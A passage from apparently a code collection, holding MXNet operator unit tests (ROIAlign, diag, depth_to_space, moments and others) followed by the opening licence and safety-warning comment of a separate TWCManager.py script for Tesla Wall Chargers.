-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@with_seed()
def test_ravel():
# be aware that check_symbolic_forward will use float type internally
# for the arrays and that limits the representable flat index range.
# Taking dim==4 and a range of [0,..,100] for the data can already
# cause precision issues and break this test.
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
shape2 = shape
shape2 = (-1,)+shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
def test_context_num_gpus():
try:
# Note: the test is run both on GPU and CPU hosts, so that we can not assert
# on a specific number here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
# Note: On a CPU only host CUDA sometimes is not able to determine the number
# of GPUs
if str(e).find("CUDA") == -1:
raise e
@with_seed()
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
assert_almost_equal(data.grad.asnumpy(), dx, atol=1e-3)
assert_almost_equal(rois.grad.asnumpy(), drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
@with_seed()
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k == 0
r = mx.nd.diag(a)
assert_almost_equal(r.asnumpy(), np.diag(a_np))
# k == 1
k = 1
r = mx.nd.diag(a, k=k)
assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
# k == -1
k = -1
r = mx.nd.diag(a, k=k)
assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
# random k
k = np.random.randint(-min(h,w) + 1, min(h,w))
r = mx.nd.diag(a, k=k)
assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
r = mx.nd.diag(a, k=k)
assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=1, axis1=1, axis2=0))
# k = -1 axis1=1, axis3=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@with_seed()
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output.asnumpy(), expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@with_seed()
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output.asnumpy(), expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
@with_seed()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
@with_seed()
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
@with_seed()
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
@with_seed()
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
@with_seed()
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
@with_seed()
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
@with_seed()
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@with_seed()
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][:] = (data_expected_3d[:][:][:] - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:][:][:][:] = (data_expected_4d[:][:][:][:] - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:][:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@with_seed()
def test_index_array():
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
@with_seed()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_zero_size_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
@with_seed()
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
for active in [True, False]:
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
@with_seed()
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
ok_(isinstance(ops, list))
ok_(len(ops) > 0)
ok_('Activation' in ops)
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
ok_(isinstance(operator_arguments, OperatorArguments))
ok_(operator_arguments.names == ['data', 'act_type'])
ok_(operator_arguments.types
== ['NDArray-or-Symbol', "{'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"])
ok_(operator_arguments.narg == 2)
if __name__ == '__main__':
import nose
nose.runmodule()
|
TWCManager.py | #! /usr/bin/python3
################################################################################
# Code and TWC protocol reverse engineering by Chris Dragon.
#
# Additional logs and hints provided by Teslamotorsclub.com users:
# TheNoOne, IanAmber, and twc.
# Thank you!
#
# For support and information, please read through this thread:
# https://teslamotorsclub.com/tmc/threads/new-wall-connector-load-sharing-protocol.72830
#
# Report bugs at https://github.com/cdragon/TWCManager/issues
#
# This software is released under the "Unlicense" model: http://unlicense.org
# This means source code and TWC protocol knowledge are released to the general
# public free for personal or commercial use. I hope the knowledge will be used
# to increase the use of green energy sources by controlling the time and power
# level of car charging.
#
# WARNING:
# Misuse of the protocol described in this software can direct a Tesla Wall
# Charger to supply more current to a car than the charger wiring was designed
# for. This will trip a circuit breaker or may start a fire in the unlikely
# event that the circuit breaker fails.
# This software was not written or designed with the benefit of information from
# Tesla and there is always a small possibility that some unforeseen aspect of
# its operation could damage a Tesla vehicle or a Tesla Wall Charger. All
# efforts have been made to avoid such damage and this software is in active use
# on the author's own vehicle and TWC.
#
# In short, USE THIS SOFTWARE AT YOUR OWN RISK.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
